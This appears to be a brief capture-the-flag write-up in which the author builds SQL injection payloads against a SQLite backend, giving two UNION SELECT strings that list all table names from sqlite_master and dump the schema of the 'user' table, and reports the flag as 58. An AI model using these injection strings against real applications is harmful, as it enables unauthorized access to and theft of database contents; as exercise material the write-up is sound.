Loading...
After looking up sqlite formats i made the payload
To get all table names and then
To get the settings of that table. the flag was 58
' UNION SELECT name,NULL,NULL,NULL FROM sqlite_master;--
' UNION SELECT sql,NULL,NULL,NULL FROM sqlite_master WHERE name = 'user' AND type = 'table';--